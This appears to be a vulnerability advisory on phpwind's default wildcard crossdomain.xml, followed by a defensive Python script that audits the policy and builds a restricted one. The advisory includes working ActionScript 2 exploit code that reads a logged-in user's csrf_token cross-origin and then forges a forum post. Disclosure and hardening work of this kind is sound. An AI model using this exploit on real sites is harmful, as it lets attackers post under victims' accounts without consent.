### Summary: phpwind misconfiguration allows CSRF posting

### Details:

The default crossdomain.xml:

```
<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
  <!-- Flash cross-domain policy; domain should be set to *.your-site-domain -->
</cross-domain-policy>
```

The comment does recommend restricting it, but the average site admin is never going to edit this file. It would be better if you rewrote crossdomain.xml from the Host header at install time.

First, fetch the CSRF token:

[![Q.png](https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png)](https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png)

```
// ActionScript 2: a SWF on any origin can read the page body because domain="*"
function gethash() {
    // extract the csrf_token hidden field from the returned HTML
    function getformhash(txt) {
        txt = txt.split('csrf_token" value="')[1].split('"')[0];
        return txt;
    }
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        if (txt) {
            txt = getformhash(txt);
        } else {
            txt = "Error connecting to server.";
        }
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    var method:String = 'GET';
    var url:String = "http://localhost:8080/index.php?c=post&fid=2";
    send_lv.sendAndLoad(url, result_lv, method);
}
gethash();
```

Then post via CSRF. phpwind doesn't even check the Referer here, so the submission can be sent directly from an external domain:

[![Q57.png](https://images.seebug.org/upload/201309/2814210375a9d3ec8d9b214e5d677a3827b2caed.png)](https://images.seebug.org/upload/201309/2814210375a9d3ec8d9b214e5d677a3827b2caed.png)

```
// ActionScript 2: submit the new-thread form with the token obtained above
function dopost() {
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    var method:String = 'post';
    var url:String = "http://localhost:8080/index.php?c=post&a=doadd&_json=1&fid=2";
    send_lv['csrf_token'] = '{{ csrf_token }}';  // value returned by gethash()
    send_lv['atc_title'] = '1380343694';
    send_lv['atc_content'] = '12112123123sdf1';
    send_lv['pid'] = '';
    send_lv['tid'] = '';
    send_lv['special'] = 'default';
    send_lv.sendAndLoad(url, result_lv, method);
}
dopost();
```

### Proof of concept:
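As an added defensive example (not phpwind's own code), a small Python audit that flags the permissive default above and builds the host-restricted policy the report asks for; the site host used is an assumed placeholder.

```python
"""Audit a Flash crossdomain.xml policy and emit a hardened one.

Added example, not phpwind's code. Assumes the format shown in the report:
a <cross-domain-policy> root with <allow-access-from domain="..."/> entries.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the permissive default described in the report.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>"""


def audit_crossdomain_policy(xml_text):
    """Return a list of findings; an empty list means no wildcard grants.

    domain="*" lets a SWF served from any origin read authenticated
    responses, which is what exposes the csrf_token in this report.
    """
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return ["root element is not <cross-domain-policy>"]
    for el in root.findall("allow-access-from"):
        if el.get("domain", "") == "*":
            findings.append('allow-access-from grants every origin (domain="*")')
        if el.get("secure", "true").lower() == "false":
            # secure="false" lets http:// content read https:// responses
            findings.append("allow-access-from sets secure=\"false\"")
    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain", "") == "*":
            findings.append("allow-http-request-headers-from grants every origin")
    return findings


def hardened_policy(site_host):
    """Build a policy limited to the site's own host and its subdomains,
    the install-time rewrite from the Host header that the report suggests."""
    root = ET.Element("cross-domain-policy")
    ET.SubElement(root, "allow-access-from", domain=site_host)
    ET.SubElement(root, "allow-access-from", domain="*." + site_host)
    return '<?xml version="1.0"?>\n' + ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print(audit_crossdomain_policy(PERMISSIVE_POLICY))
    print(hardened_policy("bbs.example.org"))  # assumed placeholder host
```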